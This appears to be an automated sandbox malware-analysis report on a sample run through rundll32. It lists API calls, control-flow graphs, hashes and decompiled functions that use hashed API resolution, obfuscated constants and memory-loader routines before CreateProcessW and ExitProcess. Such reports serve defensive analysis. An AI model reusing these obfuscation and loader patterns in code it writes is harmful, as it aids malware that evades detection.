                                                                                                                      • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,-100510D0,00000040), ref: 100127D1
                                                                                                                      • _malloc.LIBCMT ref: 100127F5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.525659251.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526098175.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526203773.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526247370.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526360152.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                      • String ID: .$.$2$3$DASHBOARD$d$d$e$kre3.l$kxnY_L?zqlSEuu5S2VFol6SH1q?86X^fU74B$l$l$l$l$l$l$l$n$ndldl
                                                                                                                      • API String ID: 572389289-1239791992
                                                                                                                      • Opcode ID: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction ID: 6af05ad5a12929315e9cbc9f274344785a9cdc676413f0efaf09fcd5afa7189b
                                                                                                                      • Opcode Fuzzy Hash: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction Fuzzy Hash: 50613FB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 59 100023b8-100023c4 55->59 60 100023aa-100023b6 55->60 57 10002414-10002421 SetLastError 56->57 58 10002426-10002445 VirtualAlloc 56->58 57->41 61 10002472-1000248a GetProcessHeap HeapAlloc 58->61 62 10002447-10002461 VirtualAlloc 58->62 63 100023c7-100023cd 59->63 60->63 65 100024ac-10002510 call 10001990 61->65 66 1000248c-100024a7 VirtualFree SetLastError 61->66 62->61 64 10002463-1000246d SetLastError 62->64 67 100023d5 63->67 68 100023cf-100023d2 63->68 64->41 72 10002512 65->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 65->73 66->41 67->54 68->67 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 102 10002621-10002643 call 1cd80c 100->102 103 1000266a-10002678 100->103 104 10002687-1000268a 101->104 106 10002646-1000264d 102->106 105 1000267b 103->105 104->41 105->104 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                      • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.525659251.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526098175.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526203773.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526247370.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526360152.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                      • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 10006A9C
                                                                                                                        • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                        • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                        • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.525659251.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526098175.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526203773.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526247370.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526360152.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 501242067-0
                                                                                                                      • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                      • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                      • GlobalHandle.KERNEL32(00727B00), ref: 100208A9
                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                      • GlobalHandle.KERNEL32(00727B00), ref: 100208DB
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                      • _memset.LIBCMT ref: 10020911
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.525659251.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526098175.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526203773.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526247370.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526360152.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 496899490-0
                                                                                                                      • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                      • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 1002FA87
                                                                                                                        • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                        • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                        • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                      • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                      • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.525659251.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526098175.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526203773.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526247370.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526360152.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714421763-0
                                                                                                                      • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                      • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001BEA7B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 220 1bea7b-1beb35 call 1bcf25 call 1b2d9f SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E001BEA7B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t41;
				intOrPtr* _t50;
				void* _t51;
				signed int _t52;
				signed int _t53;
				void* _t60;

				_t60 = __edx;
				E001BCF25(_t41);
				_v16 = 0xd33285;
				_v16 = _v16 + 0xd9cb;
				_v16 = _v16 | 0xd94823ae;
				_v16 = _v16 ^ 0xd9d95ea2;
				_v8 = 0xf9f040;
				_v8 = _v8 ^ 0x026675a4;
				_t52 = 0x46;
				_v8 = _v8 / _t52;
				_t53 = 0x2b;
				_v8 = _v8 / _t53;
				_v8 = _v8 ^ 0x000f054e;
				_v12 = 0x255c2b;
				_v12 = _v12 ^ 0x0b9b7933;
				_v12 = _v12 + 0xffff1ebc;
				_v12 = _v12 ^ 0x0bb758ac;
				_t50 = E001B2D9F(0x111af765, 0x1c, _t53, 0xe4d0349b);
				_t51 =  *_t50(0, _a8, 0, 0, _t60, 0, __edx, _a4, _a8, 0, _a16, _a20, _a24, 0); // executed
				return _t51;
			}












                                                                                                                      0x001bea85
                                                                                                                      0x001bea9a
                                                                                                                      0x001bea9f
                                                                                                                      0x001beaa9
                                                                                                                      0x001beab2
                                                                                                                      0x001beab9
                                                                                                                      0x001beac0
                                                                                                                      0x001beac7
                                                                                                                      0x001bead3
                                                                                                                      0x001bead8
                                                                                                                      0x001beae0
                                                                                                                      0x001beae8
                                                                                                                      0x001beaeb
                                                                                                                      0x001beaf2
                                                                                                                      0x001beaf9
                                                                                                                      0x001beb00
                                                                                                                      0x001beb07
                                                                                                                      0x001beb1f
                                                                                                                      0x001beb2e
                                                                                                                      0x001beb35

                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,D9D95EA2,00000000,00000000,?), ref: 001BEB2E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.524616955.00000000001B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.524808983.00000000001D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_1b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: +\%
                                                                                                                      • API String ID: 1514166925-2522068492
                                                                                                                      • Opcode ID: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction ID: 8458057e6953d71bb48db50da3d5bd639218defebda17f88215d7ec21a40a87c
                                                                                                                      • Opcode Fuzzy Hash: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction Fuzzy Hash: EA119732D00208BBDB14DEE6C94A8DFBFB6EB85310F108099F504A6210E7714B64AF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 240 10036624-10036642 HeapCreate 241 10036647-10036654 call 100365c9 240->241 242 10036644-10036646 240->242 245 10036656-10036663 call 10035aca 241->245 246 1003667a-1003667d 241->246 245->246 249 10036665-10036678 HeapDestroy 245->249 249->242
                                                                                                                      APIs
                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.525659251.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526098175.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526203773.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526247370.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526360152.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3296620671-0
                                                                                                                      • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                      • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 250 100019c0-100019ee 251 10001a02-10001a0e 250->251 252 10001a14-10001a1b 251->252 253 10001b06 251->253 254 10001a83-10001a9e call 10001990 252->254 255 10001a1d-10001a2a 252->255 256 10001b0b-10001b0e 253->256 265 10001aa0-10001aa2 254->265 266 10001aa4-10001ac9 VirtualAlloc 254->266 257 10001a2c-10001a4e VirtualAlloc 255->257 258 10001a7e 255->258 260 10001a50-10001a52 257->260 261 10001a57-10001a7b call 100017c0 257->261 258->251 260->256 261->258 265->256 268 10001acb-10001acd 266->268 269 10001acf-10001afe call 10001810 266->269 268->256 269->253
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                      • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.525659251.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526098175.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526203773.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526247370.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.526360152.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                      • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001C679C Relevance: 1.6, APIs: 1, Instructions: 65processCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 272 1c679c-1c6863 call 1bcf25 call 1b2d9f CreateProcessW
                                                                                                                      C-Code - Quality: 39%
                                                                                                                      			E001C679C(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a36, intOrPtr _a40, intOrPtr _a48, WCHAR* _a60, int _a64) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				intOrPtr _v24;
				void* _t40;
				int _t46;
				WCHAR* _t50;

				_push(_a64);
				_t50 = __ecx;
				_push(_a60);
				_push(0);
				_push(0);
				_push(_a48);
				_push(0);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001BCF25(_t40);
				_v24 = 0x639852;
				_v20 = 0;
				_v12 = 0x9647c4;
				_v12 = _v12 + 0x4343;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x0009af77;
				_v16 = 0x17e0ca;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x000f0fb4;
				_v8 = 0x429f7b;
				_v8 = _v8 + 0xffff27c2;
				_v8 = _v8 + 0xb08b;
				_v8 = _v8 ^ 0x004b6691;
				E001B2D9F(0xb8601dc2, 0x1c8, __ecx, 0xa62ab78c);
				_t46 = CreateProcessW(_a60, _t50, 0, 0, _a64, 0, 0, 0, _a36, _a4); // executed
				return _t46;
			}











                                                                                                                      0x001c67a4
                                                                                                                      0x001c67a9
                                                                                                                      0x001c67ab
                                                                                                                      0x001c67ae
                                                                                                                      0x001c67af
                                                                                                                      0x001c67b0
                                                                                                                      0x001c67b3
                                                                                                                      0x001c67b4
                                                                                                                      0x001c67b7
                                                                                                                      0x001c67ba
                                                                                                                      0x001c67bb
                                                                                                                      0x001c67be
                                                                                                                      0x001c67c1
                                                                                                                      0x001c67c4
                                                                                                                      0x001c67c7
                                                                                                                      0x001c67c8
                                                                                                                      0x001c67cb
                                                                                                                      0x001c67cf
                                                                                                                      0x001c67d0
                                                                                                                      0x001c67d5
                                                                                                                      0x001c67df
                                                                                                                      0x001c67e2
                                                                                                                      0x001c67e9
                                                                                                                      0x001c67f0
                                                                                                                      0x001c67f4
                                                                                                                      0x001c67fb
                                                                                                                      0x001c6802
                                                                                                                      0x001c6806
                                                                                                                      0x001c680d
                                                                                                                      0x001c6814
                                                                                                                      0x001c681b
                                                                                                                      0x001c6822
                                                                                                                      0x001c6842
                                                                                                                      0x001c685c
                                                                                                                      0x001c6863

                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,00D9A4AC,00000000,00000000,?,00000000,00000000,00000000,?,0009AF77), ref: 001C685C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.524616955.00000000001B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.524808983.00000000001D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_1b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction ID: 7b19a71af537b600b0fd74417aa76981ec9603e3fb0e5ebf3dbf4a981a07cac0
                                                                                                                      • Opcode Fuzzy Hash: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction Fuzzy Hash: 8921E772900248BBCF119FD5CD09CDFBFB9EF99714F008188FA1466120D7B68A64EBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001C3CBB Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 277 1c3cbb-1c3d40 call 1b2d9f ExitProcess
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E001C3CBB() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _t37;

				_v20 = _v20 & 0x00000000;
				_v24 = 0x868838;
				_v16 = 0xb6c7ac;
				_t37 = 0x79;
				_v16 = _v16 * 0x7d;
				_v16 = _v16 ^ 0x593c5b8b;
				_v8 = 0x23929;
				_v8 = _v8 | 0xd856564b;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x67f2afdd;
				_v12 = 0x42ac5b;
				_v12 = _v12 / _t37;
				_v12 = _v12 ^ 0x0009f0c4;
				E001B2D9F(0x8cff02b7, 0x12e, _t37, 0xa62ab78c);
				ExitProcess(0);
			}









                                                                                                                      0x001c3cc1
